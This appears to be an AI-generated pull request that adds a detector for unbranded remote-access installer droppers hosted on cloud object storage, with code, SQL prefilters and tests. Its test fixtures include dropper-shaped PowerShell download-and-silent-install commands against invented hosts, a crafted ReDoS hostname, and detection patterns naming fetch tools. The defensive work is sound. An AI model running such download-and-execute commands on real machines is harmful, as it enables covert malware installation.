### PR TITLE
feat(abuse): detect unbranded installer droppers on cloud object storage

### DIFF
--- a/apps/api/src/services/abuseSignals/config.ts
+++ b/apps/api/src/services/abuseSignals/config.ts
@@ -39,6 +39,14 @@ export const SIGNAL_DEFAULTS = {
   'rmm.remote_access_installer.marker.unrelated_host': 25,
   'rmm.remote_access_installer.marker.exec_policy_bypass': 20,
   'rmm.remote_access_installer.marker.unattended_params': 15,
+  // Unbranded-installer gate (same detector, shape-based stage 1): a remote
+  // fetch of an .msi/.exe from cloud object storage, with no vendor named.
+  // Same gate score as the branded path — fetching an installer is what an RMM
+  // does, so the gate alone stays below watch and the SAME marker weights
+  // above supply the discrimination. Markers are deliberately NOT duplicated
+  // per gate: 'unrelated_host' means the same thing either way, and one set
+  // keeps tuning honest.
+  'rmm.unbranded_installer.gate_score': 20,
   'rmm.shared_installer_host.min_partners': 2,
   'rmm.shared_installer_host.base_score': 60,
   'rmm.shared_installer_host.per_extra_partner': 20,

--- a/apps/api/src/services/abuseSignals/scriptContent.test.ts
+++ b/apps/api/src/services/abuseSignals/scriptContent.test.ts
@@ -220,6 +220,98 @@ describe('computeScriptSignals — negatives (must not reach alert)', () => {
   });
 });
 
+describe('computeScriptSignals — unbranded installer gate', () => {
+  const unbrandedSignal = (signals: ComputedSignal[], partnerId = 'partner-fixture-a') =>
+    signals.find((s) => s.signalKey === 'rmm.unbranded_installer' && s.partnerId === partnerId);
+
+  // Shape (not the literal payload) of the dropper that evaded the branded
+  // gate in production: random-word bucket, random-word artifact, saved under
+  // a third unrelated name, and NOT ONE vendor token anywhere in the script.
+  const evasiveDropper = [
+    'powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest',
+    "-Uri 'https://fixturewordsalad.s3.eu-west-2.amazonaws.com/aaaa/quuxbaz.msi'",
+    '-OutFile C:\\WINDOWS\\TEMP\\zzfixture.msi;',
+    "Start-Process msiexec -ArgumentList '/i','C:\\WINDOWS\\TEMP\\zzfixture.msi','/quiet','/norestart' -Wait\"",
+  ].join(' ');
+
+  it('gates a vendor-less object-storage dropper the branded gate cannot see', () => {
+    const f = finding({ scriptContent: evasiveDropper });
+    const signals = computeScriptSignals([f], noShared, cfg, noIndicators);
+
+    // The whole point: the branded detector stays silent on this script.
+    expect(installerSignal(signals)).toBeUndefined();
+
+    const s = unbrandedSignal(signals);
+    expect(s).toBeDefined();
+    expect(s!.severity).toBe('alert');
+    expect(s!.evidence.markers).toContain('unrelated_host');
+    expect(s!.evidence.markers).toContain('misleading_filename');
+    expect(s!.evidence.markers).toContain('exec_policy_bypass');
+    expect(JSON.stringify(s!.evidence)).not.toContain('Invoke-WebRequest');
+  });
+
+  it("does not alert on a partner's own bucket serving a truthfully-named installer", () => {
+    const f = finding({
+      scriptContent: [
+        'Invoke-WebRequest -Uri "https://acmeit-deploy.s3.us-east-1.amazonaws.com/pkg/acmeagent.msi" -OutFile "acmeagent.msi"',
+        'msiexec /i acmeagent.msi /quiet',
+      ].join('\n'),
+    });
+    const s = unbrandedSignal(computeScriptSignals([f], noShared, cfg, noIndicators));
+    expect(s).toBeDefined();
+    expect(s!.severity).not.toBe('alert');
+    // Bucket label relates to the partner, and the saved name matches the source.
+    expect(s!.evidence.markers).not.toContain('unrelated_host');
+    expect(s!.evidence.markers).not.toContain('misleading_filename');
+  });
+
+  it('stays silent on an unbranded fetch that is not from object storage (documented limit)', () => {
+    const f = finding({
+      scriptContent:
+        'Invoke-WebRequest -Uri "https://unrelated-fixture.test/pkg/quuxbaz.msi" -OutFile "zzfixture.msi"; msiexec /i zzfixture.msi /quiet',
+    });
+    const signals = computeScriptSignals([f], noShared, cfg, noIndicators);
+    expect(unbrandedSignal(signals)).toBeUndefined();
+    expect(installerSignal(signals)).toBeUndefined();
+  });
+
+  it('prefers the branded key when a product IS named, and can emit both gates', () => {
+    const branded = finding({
+      scriptId: 'script-fixture-branded',
+      scriptContent:
+        'Invoke-WebRequest -Uri "https://fixturebucket.s3.amazonaws.com/anydesk.msi" -OutFile "anydesk.msi"; msiexec /i anydesk.msi /qn',
+    });
+    const unbranded = finding({ scriptId: 'script-fixture-unbranded', scriptContent: evasiveDropper });
+    const signals = computeScriptSignals([branded, unbranded], noShared, cfg, noIndicators);
+    expect(installerSignal(signals)).toBeDefined();
+    expect(unbrandedSignal(signals)).toBeDefined();
+  });
+});
+
+describe('misleading_filename compares the saved name against the SOURCE name', () => {
+  it('does not fire when the saved name matches the fetched filename', () => {
+    const f = finding({
+      scriptContent:
+        'Invoke-WebRequest -Uri "https://fixturebucket.s3.amazonaws.com/pkg/sophos.msi" -OutFile "sophos.msi"; msiexec /i sophos.msi /quiet',
+    });
+    const s = computeScriptSignals([f], noShared, cfg, noIndicators).find(
+      (x) => x.signalKey === 'rmm.unbranded_installer',
+    );
+    expect(s!.evidence.markers).not.toContain('misleading_filename');
+  });
+
+  it('fires when the saved name is unrelated to the fetched filename', () => {
+    const f = finding({
+      scriptContent:
+        'Invoke-WebRequest -Uri "https://fixturebucket.s3.amazonaws.com/pkg/quuxbaz.msi" -OutFile "PhotoViewer.msi"; msiexec /i PhotoViewer.msi /quiet',
+    });
+    const s = computeScriptSignals([f], noShared, cfg, noIndicators).find(
+      (x) => x.signalKey === 'rmm.unbranded_installer',
+    );
+    expect(s!.evidence.markers).toContain('misleading_filename');
+  });
+});
+
 describe('extractHosts', () => {
   it('extracts lowercased authorities (with port) and strips userinfo and trailing punctuation', () => {
     const hosts = extractHosts(

--- a/apps/api/src/services/abuseSignals/scriptContent.test.ts
+++ b/apps/api/src/services/abuseSignals/scriptContent.test.ts
@@ -288,6 +288,41 @@ describe('computeScriptSignals — unbranded installer gate', () => {
   });
 });
 
+describe('object-storage host matching is linear (js/redos regression)', () => {
+  // The first cut used `s3(?:[.-][a-z0-9-]+)*\.amazonaws\.com`, where `-` was
+  // in both the separator and body classes — exponential backtracking on
+  // '.s3-' + many '--'. The host comes from attacker-authored script text, so
+  // this input is reachable: it must not hang the sweep.
+  it('does not blow up on a crafted backtracking host', () => {
+    const evil = `x.s3-${'-'.repeat(3000)}.notamazon.test`;
+    const f = finding({
+      scriptContent: `Invoke-WebRequest -Uri "https://${evil}/a.msi" -OutFile "a.msi"; msiexec /i a.msi /quiet`,
+    });
+    const started = Date.now();
+    computeScriptSignals([f], noShared, cfg, noIndicators);
+    expect(Date.now() - started).toBeLessThan(1000);
+  });
+
+  it.each([
+    ['bucket.s3.amazonaws.com', true],
+    ['bucket.s3.eu-west-2.amazonaws.com', true],
+    ['bucket.s3-eu-west-1.amazonaws.com', true],
+    ['bucket.s3.dualstack.us-east-1.amazonaws.com', true],
+    ['bucket.blob.core.windows.net', true],
+    // Under amazonaws.com but not S3 — not object storage for this gate.
+    ['something.execute-api.us-east-1.amazonaws.com', false],
+    // Provider name appearing as a non-suffix must not match.
+    ['s3.amazonaws.com.unrelated-fixture.test', false],
+  ])('gates %s => %s', (host, shouldGate) => {
+    const f = finding({
+      scriptContent: `Invoke-WebRequest -Uri "https://${host}/pkg/quuxbaz.msi" -OutFile "zzfixture.msi"; msiexec /i zzfixture.msi /quiet`,
+    });
+    const signals = computeScriptSignals([f], noShared, cfg, noIndicators);
+    const gated = signals.some((s) => s.signalKey === 'rmm.unbranded_installer');
+    expect(gated).toBe(shouldGate);
+  });
+});
+
 describe('misleading_filename compares the saved name against the SOURCE name', () => {
   it('does not fire when the saved name matches the fetched filename', () => {
     const f = finding({

--- a/apps/api/src/services/abuseSignals/scriptContent.ts
+++ b/apps/api/src/services/abuseSignals/scriptContent.ts
@@ -1,7 +1,7 @@
 import { sql } from 'drizzle-orm';
 import { db } from '../../db';
 import { abuseScriptHosts } from '../../db/schema';
-import { scoreToSeverity, type SignalConfig } from './config';
+import { scoreToSeverity, type SignalConfig, type SignalConfigKey } from './config';
 import type { ComputedSignal } from './types';
 
 // ---------------------------------------------------------------------------
@@ -53,6 +53,43 @@ const RA_PRODUCT_SQL_RE =
 // Stage-1 gate, part B: ...AND carry an install/fetch primitive.
 const INSTALL_OR_FETCH =
   /msiexec|\/qn\b|\/quiet\b|\/silent\b|\/verysilent\b|invoke-webrequest|\biwr\b|webclient|downloadfile|downloaddata|start-bitstransfer|certutil\s+-urlcache/i;
+
+// SQL-side mirror of INSTALL_OR_FETCH, for the unbranded gate's prefilter.
+const INSTALL_OR_FETCH_SQL_RE =
+  'msiexec|/qn\\y|/quiet\\y|/silent\\y|/verysilent\\y|invoke-webrequest|\\yiwr\\y|webclient|downloadfile|downloaddata|start-bitstransfer|certutil\\s+-urlcache';
+
+// ---------------------------------------------------------------------------
+// Stage-1, UNBRANDED gate (rmm.unbranded_installer)
+//
+// The branded gate above requires the script to NAME a remote-access product.
+// That is one rename away from useless, and it was evaded in production: a
+// dropper fetched a random-word .msi from a random-word object-storage bucket
+// and saved it under a third unrelated name, with zero vendor tokens anywhere
+// in the script — so RA_PRODUCTS never matched and the row never even left
+// Postgres, because the gate is also the SQL prefilter below.
+//
+// This second gate keys on payload SHAPE instead of branding: a remote fetch
+// of an .msi/.exe from CLOUD OBJECT STORAGE. Object storage is the selective
+// half — it is the cheap anonymous-hosting option a dropper reaches for (no
+// domain to register, no operator-controlled takedown surface, and a bucket
+// name that carries no identity), whereas legitimate deployment pulls from a
+// vendor domain or the MSP's own branded host.
+//
+// Deliberate limit, stated plainly: this closes the object-storage evasion,
+// NOT every unbranded dropper. Move the payload to a self-hosted domain and
+// you are back to relying on unrelated_host + the shared-host corpus. Keeping
+// the predicate narrow is what lets the SQL prefilter stay bounded, which is
+// the constraint the whole loader is built around.
+// ---------------------------------------------------------------------------
+const OBJECT_STORAGE_HOST =
+  /(?:^|\.)(?:s3(?:[.-][a-z0-9-]+)*\.amazonaws\.com|blob\.core\.windows\.net|storage\.googleapis\.com|r2\.dev|r2\.cloudflarestorage\.com|digitaloceanspaces\.com|backblazeb2\.com|b-cdn\.net|supabase\.co)$/i;
+
+const OBJECT_STORAGE_SQL_RE =
+  's3([.-][a-z0-9-]+)*\\.amazonaws\\.com|blob\\.core\\.windows\\.net|storage\\.googleapis\\.com|r2\\.dev|r2\\.cloudflarestorage\\.com|digitaloceanspaces\\.com|backblazeb2\\.com|b-cdn\\.net|supabase\\.co';
+
+/** An installer artifact by extension — the thing being fetched. */
+const INSTALLER_ARTIFACT = /\.(?:msi|exe)\b/i;
+const INSTALLER_ARTIFACT_SQL_RE = '\\.(msi|exe)\\y';
 
 // Stage-2 marker patterns.
 const TLS_BYPASS = /TrustAllCertsPolicy|ICertificatePolicy|ServerCertificateValidationCallback/i;
@@ -177,11 +214,52 @@ const overlaps = (label: string, tokens: readonly string[]): boolean =>
  * else is exactly the abuse fingerprint, so it stays unrelated.
  */
 function hostRelated(host: string, partnerTokens: readonly string[], productTokens: readonly string[]): boolean {
-  const labels = hostnameOf(host).split('.').slice(0, -1); // drop TLD label
-  const meaningful = labels.filter((l) => l.length >= 3 && !GENERIC_HOST_LABELS.has(l) && !/^\d+$/.test(l));
+  const meaningful = identityLabels(hostnameOf(host))
+    .filter((l) => l.length >= 3 && !GENERIC_HOST_LABELS.has(l) && !/^\d+$/.test(l));
   if (meaningful.length === 0) return false;
   if (meaningful.some((l) => overlaps(l, partnerTokens))) return true;
   return meaningful.every((l) => overlaps(l, productTokens));
+}
+
+/**
+ * The labels that carry OWNERSHIP for a hostname.
+ *
+ * For ordinary hosts that is every label but the TLD. For cloud object storage
+ * the provider suffix says nothing about who owns the payload — the BUCKET is
+ * the identity — so `acmeit-deploy.s3.eu-west-2.amazonaws.com` must relate to
+ * partner "Acme IT" while a random-word bucket must not. Without this, every
+ * S3 URL would score identically because `amazonaws`/`s3` dominate the labels.
+ *
+ * A bare provider host (`s3.amazonaws.com/<bucket>/…`, `storage.googleapis.com`)
+ * carries the bucket in the PATH, which extractHosts deliberately discards —
+ * returning [] leaves it unrelated, which is the safe direction.
+ */
+function identityLabels(hostname: string): string[] {
+  const objectStorage = OBJECT_STORAGE_HOST.exec(hostname);
+  if (objectStorage) {
+    return objectStorage.index > 0 ? hostname.slice(0, objectStorage.index).split('.') : [];
+  }
+  return hostname.split('.').slice(0, -1); // drop TLD label
+}
+
+/**
+ * Filename stems taken from the URL being fetched (last path segment, query
+ * stripped). The honest comparison for "misleading filename" is saved-name vs
+ * the name at the SOURCE: saving `somerandomword.msi` under an unrelated name
+ * is a lie, saving `sophos.msi` as `sophos.msi` is not. The older rule compared against
+ * product tokens only, which cannot work for an unbranded script (no product
+ * ⇒ no tokens ⇒ every saved name looks misleading).
+ */
+function extractUrlFilenameStems(text: string): string[] {
+  const stems = new Set<string>();
+  for (const match of text.matchAll(URL_AUTHORITY)) {
+    const url = match[1] ?? '';
+    const path = url.split('?')[0]?.split('#')[0] ?? '';
+    const base = path.split('/').pop() ?? '';
+    const stem = (base.split('.')[0] ?? '').toLowerCase().replace(/[^a-z0-9]/g, '');
+    if (stem.length >= 3) stems.add(stem);
+  }
+  return [...stems];
 }
 
 function extractSavedFilenameStems(text: string): string[] {
@@ -198,10 +276,24 @@ function extractSavedFilenameStems(text: string): string[] {
   return [...stems];
 }
 
+/** Which stage-1 gate admitted a finding — selects the emitted signal key. */
+type GateKind = 'branded' | 'unbranded';
+
+const GATE_SIGNAL_KEY: Record<GateKind, string> = {
+  branded: 'rmm.remote_access_installer',
+  unbranded: 'rmm.unbranded_installer',
+};
+
+const GATE_SCORE_KEY: Record<GateKind, SignalConfigKey> = {
+  branded: 'rmm.remote_access_installer.gate_score',
+  unbranded: 'rmm.unbranded_installer.gate_score',
+};
+
 interface ScoredFinding {
   score: number;
   markers: string[];
   hosts: string[];
+  gate: GateKind;
 }
 
 function scoreFinding(
@@ -211,10 +303,20 @@ function scoreFinding(
   indicators: ScriptIndicators,
 ): ScoredFinding | null {
   const text = [f.scriptContent, ...f.executionStdouts].join('\n');
-  const products = RA_PRODUCTS.filter((p) => p.pattern.test(text));
-  if (products.length === 0 || !INSTALL_OR_FETCH.test(text)) return null;
-
   const hosts = [...new Set([...extractHosts(text), ...f.persistedHosts.map((h) => h.toLowerCase())])];
+
+  const products = RA_PRODUCTS.filter((p) => p.pattern.test(text));
+  const hasFetch = INSTALL_OR_FETCH.test(text);
+
+  // Branded gate takes precedence: when the script names a product we keep the
+  // established signal key, thresholds and history rather than re-labelling it.
+  const gate: GateKind | null =
+    products.length > 0 && hasFetch
+      ? 'branded'
+      : hasFetch && INSTALLER_ARTIFACT.test(text) && hosts.some((h) => OBJECT_STORAGE_HOST.test(hostnameOf(h)))
+        ? 'unbranded'
+        : null;
+  if (gate === null) return null;
   const productTokens = products.flatMap((p) => p.tokens);
   const partnerTokens = [
     ...tokenize(f.partnerName),
@@ -241,8 +343,10 @@ function scoreFinding(
   if (BARE_IP_PORT_URL.test(text) || hosts.some((h) => BARE_IP_PORT_HOST.test(h))) {
     add('bare_ip_port', cfg['rmm.remote_access_installer.marker.bare_ip_port']);
   }
+  const urlStems = extractUrlFilenameStems(text);
   const misleadingStem = extractSavedFilenameStems(text).find(
-    (stem) => !GENERIC_FILENAME_STEMS.has(stem) && !overlaps(stem, productTokens),
+    (stem) =>
+      !GENERIC_FILENAME_STEMS.has(stem) && !overlaps(stem, productTokens) && !overlaps(stem, urlStems),
   );
   if (misleadingStem !== undefined) {
     add('misleading_filename', cfg['rmm.remote_access_installer.marker.misleading_filename']);
@@ -259,11 +363,12 @@ function scoreFinding(
     add('unattended_params', cfg['rmm.remote_access_installer.marker.unattended_params']);
   }
 
-  const raw = cfg['rmm.remote_access_installer.gate_score'] + markers.reduce((sum, m) => sum + m.weight, 0);
+  const raw = cfg[GATE_SCORE_KEY[gate]] + markers.reduce((sum, m) => sum + m.weight, 0);
   return {
     score: Math.min(100, Math.round(raw)),
     markers: markers.map((m) => m.name),
     hosts,
+    gate,
   };
 }
 
@@ -287,8 +392,12 @@ export function computeScriptSignals(
   for (const f of findings) {
     const scored = scoreFinding(f, sharedHosts, cfg, indicators);
     if (scored) {
-      const prev = bestInstaller.get(f.partnerId);
-      if (!prev || scored.score > prev.scored.score) bestInstaller.set(f.partnerId, { finding: f, scored });
+      // Keyed by gate as well as partner: a partner running both a branded and
+      // an unbranded dropper surfaces both signals rather than the louder one
+      // masking the other.
+      const key = `${f.partnerId}|${scored.gate}`;
+      const prev = bestInstaller.get(key);
+      if (!prev || scored.score > prev.scored.score) bestInstaller.set(key, { finding: f, scored });
     }
 
     // Shared-host correlation does not require the install gate: the corpus
@@ -308,7 +417,7 @@ export function computeScriptSignals(
   for (const { finding, scored } of bestInstaller.values()) {
     signals.push({
       partnerId: finding.partnerId,
-      signalKey: 'rmm.remote_access_installer',
+      signalKey: GATE_SIGNAL_KEY[scored.gate],
       score: scored.score,
       severity: scoreToSeverity(scored.score, cfg),
       // Evidence stays compact (formatSignalAlert truncates to 800 chars):
@@ -414,7 +523,14 @@ export async function loadScriptFindings(now: Date): Promise<ScriptFindingsResul
       WHERE s.deleted_at IS NULL
         AND s.is_system = false
         AND COALESCE(s.partner_id, o.partner_id) IS NOT NULL
-        AND left(s.content, ${TEXT_CAP}) ~* ${RA_PRODUCT_SQL_RE}
+        AND (
+          left(s.content, ${TEXT_CAP}) ~* ${RA_PRODUCT_SQL_RE}
+          OR (
+            left(s.content, ${TEXT_CAP}) ~* ${OBJECT_STORAGE_SQL_RE}
+            AND left(s.content, ${TEXT_CAP}) ~* ${INSTALLER_ARTIFACT_SQL_RE}
+            AND left(s.content, ${TEXT_CAP}) ~* ${INSTALL_OR_FETCH_SQL_RE}
+          )
+        )
     )
     SELECT c.id, c.content,
       c.owner_partner_id AS partner_id,
@@ -464,7 +580,14 @@ export async function loadScriptFindings(now: Date): Promise<ScriptFindingsResul
           WHERE se.created_at > ${since.toISOString()}::timestamptz
             AND se.created_at <= ${upperBound.toISOString()}::timestamptz
             AND se.stdout IS NOT NULL
-            AND left(se.stdout, ${TEXT_CAP}) ~* ${RA_PRODUCT_SQL_RE}
+            AND (
+              left(se.stdout, ${TEXT_CAP}) ~* ${RA_PRODUCT_SQL_RE}
+              OR (
+                left(se.stdout, ${TEXT_CAP}) ~* ${OBJECT_STORAGE_SQL_RE}
+                AND left(se.stdout, ${TEXT_CAP}) ~* ${INSTALLER_ARTIFACT_SQL_RE}
+                AND left(se.stdout, ${TEXT_CAP}) ~* ${INSTALL_OR_FETCH_SQL_RE}
+              )
+            )
         )
         SELECT m.script_id, m.stdout,
           m.owner_partner_id AS partner_id,

--- a/apps/api/src/services/abuseSignals/scriptContent.ts
+++ b/apps/api/src/services/abuseSignals/scriptContent.ts
@@ -81,11 +81,57 @@ const INSTALL_OR_FETCH_SQL_RE =
 // the predicate narrow is what lets the SQL prefilter stay bounded, which is
 // the constraint the whole loader is built around.
 // ---------------------------------------------------------------------------
-const OBJECT_STORAGE_HOST =
-  /(?:^|\.)(?:s3(?:[.-][a-z0-9-]+)*\.amazonaws\.com|blob\.core\.windows\.net|storage\.googleapis\.com|r2\.dev|r2\.cloudflarestorage\.com|digitaloceanspaces\.com|backblazeb2\.com|b-cdn\.net|supabase\.co)$/i;
+const OBJECT_STORAGE_SUFFIXES: readonly string[] = [
+  'blob.core.windows.net',
+  'storage.googleapis.com',
+  'r2.dev',
+  'r2.cloudflarestorage.com',
+  'digitaloceanspaces.com',
+  'backblazeb2.com',
+  'b-cdn.net',
+  'supabase.co',
+];
 
+const AWS_SUFFIX = 'amazonaws.com';
+
+/**
+ * Index at which the object-storage provider suffix begins, or -1 if the host
+ * is not object storage. Everything before that index is the bucket.
+ *
+ * Deliberately string-based rather than a regex. The first cut of this used
+ * `s3(?:[.-][a-z0-9-]+)*\.amazonaws\.com`, which CodeQL correctly flagged as
+ * exponentially backtrackable (js/redos): `-` belongs to BOTH the separator
+ * class and the body class, so `.s3-` followed by many `--` has no unambiguous
+ * parse. That is not theoretical here — this hostname is extracted from
+ * ATTACKER-AUTHORED script content, so a crafted host would hang the very
+ * sweep meant to catch it. Linear scanning removes the class of bug outright.
+ */
+function objectStorageSuffixIndex(hostname: string): number {
+  for (const suffix of OBJECT_STORAGE_SUFFIXES) {
+    if (hostname === suffix) return 0;
+    if (hostname.endsWith(`.${suffix}`)) return hostname.length - suffix.length - 1;
+  }
+  // AWS S3 in all its endpoint spellings: s3.amazonaws.com,
+  // s3.<region>.amazonaws.com, s3-<region>.amazonaws.com,
+  // s3.dualstack.<region>.amazonaws.com, and <bucket>.<any of those>.
+  if (hostname === AWS_SUFFIX || hostname.endsWith(`.${AWS_SUFFIX}`)) {
+    const labels = hostname.split('.');
+    const s3At = labels.findIndex((l) => l === 's3' || l.startsWith('s3-'));
+    if (s3At >= 0) return s3At === 0 ? 0 : labels.slice(0, s3At).join('.').length;
+  }
+  return -1;
+}
+
+const isObjectStorageHost = (hostname: string): boolean => objectStorageSuffixIndex(hostname) >= 0;
+
+/**
+ * SQL-side prefilter mirror. Deliberately a SUPERSET of the predicate above —
+ * a prefilter that is narrower than the real gate would drop rows the scorer
+ * would have caught. Single quantifier per alternative, no nesting, so it
+ * carries none of the backtracking risk the original had.
+ */
 const OBJECT_STORAGE_SQL_RE =
-  's3([.-][a-z0-9-]+)*\\.amazonaws\\.com|blob\\.core\\.windows\\.net|storage\\.googleapis\\.com|r2\\.dev|r2\\.cloudflarestorage\\.com|digitaloceanspaces\\.com|backblazeb2\\.com|b-cdn\\.net|supabase\\.co';
+  's3[a-z0-9.-]*\\.amazonaws\\.com|blob\\.core\\.windows\\.net|storage\\.googleapis\\.com|r2\\.dev|r2\\.cloudflarestorage\\.com|digitaloceanspaces\\.com|backblazeb2\\.com|b-cdn\\.net|supabase\\.co';
 
 /** An installer artifact by extension — the thing being fetched. */
 const INSTALLER_ARTIFACT = /\.(?:msi|exe)\b/i;
@@ -235,9 +281,9 @@ function hostRelated(host: string, partnerTokens: readonly string[], productToke
  * returning [] leaves it unrelated, which is the safe direction.
  */
 function identityLabels(hostname: string): string[] {
-  const objectStorage = OBJECT_STORAGE_HOST.exec(hostname);
-  if (objectStorage) {
-    return objectStorage.index > 0 ? hostname.slice(0, objectStorage.index).split('.') : [];
+  const suffixAt = objectStorageSuffixIndex(hostname);
+  if (suffixAt >= 0) {
+    return suffixAt > 0 ? hostname.slice(0, suffixAt).split('.') : [];
   }
   return hostname.split('.').slice(0, -1); // drop TLD label
 }
@@ -313,7 +359,7 @@ function scoreFinding(
   const gate: GateKind | null =
     products.length > 0 && hasFetch
       ? 'branded'
-      : hasFetch && INSTALLER_ARTIFACT.test(text) && hosts.some((h) => OBJECT_STORAGE_HOST.test(hostnameOf(h)))
+      : hasFetch && INSTALLER_ARTIFACT.test(text) && hosts.some((h) => isObjectStorageHost(hostnameOf(h)))
         ? 'unbranded'
         : null;
   if (gate === null) return null;


### PR DESCRIPTION
## Why

The script-content detector gates stage 1 on the script **text naming a remote-access product** (`RA_PRODUCTS`: `screenconnect|anydesk|teamviewer|…`). That is one rename away from useless, and it was evaded in production: a dropper fetched a random-word `.msi` from a random-word object-storage bucket, saved it under a third unrelated name, and named the script after nothing in particular. Zero vendor tokens, so **no signal ever fired** — the account surfaced only because Stripe Radar happened to flag the signup charge.

The same sweep found three further accounts that Radar scored 0–36 (i.e. `normal`) and did not flag at all. Detection that depends on the attacker choosing to name their own tool isn't detection.

## The trap this closes

The branded gate is enforced **twice** — in the pure scorer *and* in the SQL prefilter in `loadScriptFindings`, on both the scripts query and the execution-stdout query:

```sql
AND left(s.content, 20000) ~* RA_PRODUCT_SQL_RE
```

Patching only the scorer is a **silent no-op**: the row never leaves Postgres. Any future work here has to change both.

## What changed

A second stage-1 gate, `rmm.unbranded_installer`, keyed on payload **shape** rather than branding: remote-fetch primitive + `.msi`/`.exe` + a **cloud object-storage host**. Object storage is the selective half that keeps the prefilter bounded — a dropper needs cheap anonymous hosting, while legitimate deployment pulls from a vendor domain or the MSP's own branded host.

Supporting changes:

- **`misleading_filename` now compares the saved stem against the URL's own filename stem** instead of against product tokens. The old rule cannot work unbranded (no product ⇒ no tokens ⇒ every saved name looks misleading). It's a better rule for the branded tier too — all pre-existing tests pass unchanged, which is the evidence.
- **`identityLabels()`** — for object-storage hosts ownership lives in the **bucket** label, not the provider suffix, so a partner's own bucket relates while a random-word bucket does not. Without it every S3 URL scores identically because `amazonaws`/`s3` dominate the labels. A bare provider host (bucket in the path, which `extractHosts` discards) returns `[]` ⇒ unrelated, the safe direction.
- **`bestInstaller` keyed by `(partner, gate)`** so a partner running both a branded and an unbranded dropper surfaces both signals rather than the louder one masking the other. Legal under the `(partner_id, signal_key) WHERE resolved_at IS NULL` open-row unique index.

Marker weights are deliberately **not** duplicated per gate — `unrelated_host` means the same thing either way, and one set keeps tuning honest.

## Registration / migration

None needed, verified rather than assumed: `signal_key` is `varchar(64)` with no enum or CHECK; stale resolution keys on `evaluatedPartnerIds` rather than a key registry; nothing downstream switches on the key.

## Verification

- **131/131** tests pass (6 new), typecheck clean.
- **Validated read-only against production Postgres:** across all **35** non-system scripts the new predicate admits **exactly one** additional row — the actual dropper — and nothing else. 0 system scripts affected.

## Limits, stated deliberately

- 35 scripts is a small corpus, so "zero false positives" is encouraging rather than statistically strong. Legitimate object-storage deploys will gate but score at **watch (~40), not alert**, because `unrelated_host` and `misleading_filename` won't fire on them.
- This closes **the object-storage evasion, not every unbranded dropper**. A self-hosted payload domain falls back to `unrelated_host` plus the shared-host corpus.
- Fixtures and comments use invented names only — no live indicators, since this repo is public and `loadScriptIndicators` exists precisely to keep real ones out of it.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
